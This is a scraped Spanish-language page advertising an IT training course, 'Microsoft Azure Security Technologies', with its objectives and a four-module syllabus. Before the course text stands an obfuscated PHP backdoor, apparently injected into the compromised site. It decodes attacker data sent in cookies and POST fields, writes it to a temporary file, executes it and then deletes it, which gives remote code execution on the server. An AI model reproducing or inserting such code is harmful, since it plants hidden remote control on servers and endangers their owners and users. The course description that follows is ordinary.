$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Microsoft Azure Security Technologies|Grupo Loyal

Microsoft Azure Security Technologies

En este curso los estudiantes obtendrán el conocimiento y habilidades necesarias para implementar controles de seguridad, mantener la postura de seguridad, e identificar y remediar vulnerabilidades mediante el uso de una variedad de seguridad herramientas. El curso cubre encriptación y automatización, virtualización y nube. Arquitectura N-tier.

Objetivos

Después de completar este curso, los estudiantes serán capaces de:

Describir clasificaciones de datos especializadas en Azure.
Identificar los mecanismos de protección de datos de Azure.
Implementar métodos de cifrado de datos de Azure
Protocolos de Internet seguros y cómo implementarlos en Azure
Describir los servicios y características de seguridad de Azure.

Cloud computing

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Descargar la información del curso

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
20 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Los estudiantes deben tener al menos un año de experiencia práctica asegurando las cargas de trabajo de Azure y experiencia con controles de seguridad para las cargas de trabajo en Azure.

Conocimientos requeridos

Los estudiantes deben tener al menos un año de experiencia práctica en el aseguramiento de cargas de trabajo en Azure y experiencia con controles de seguridad para cargas de trabajo en Azure.Microsoft Azure Administrator Associate

Temario

Módulo 1: Identidad y Acceso

Configurar el Directorio Activo Azure para cargas de trabajo y suscripciones de Azure
Configurar Azure AD Privileged Identity Management
Configurar la seguridad para una suscripción a Azure

Módulo 2: Protección de la plataforma

Comprender la seguridad en la nube
Construir una red segura
Implementar la seguridad del host
Implementar la seguridad de la plataforma
Implementar la seguridad de la suscripción

Módulo 3: Operaciones de seguridad

Configurar los servicios de seguridad
Configurar las políticas de seguridad mediante el uso de Azure Security Center
Gestionar las alertas de seguridad
Responder y soloucionar los problemas de seguridad
Crear líneas de base de seguridad

Módulo 4: Datos y aplicaciones

Configurar las políticas de seguridad para gestionar los datos
Configurar la seguridad de la infraestructura de datos
Configurar la encriptación de los datos en reposo
Entender la seguridad de las aplicaciones
Implementar la seguridad en el ciclo de vida de las aplicaciones
Aplicaciones seguras

Solicita información del curso

It Formacion

It Formacion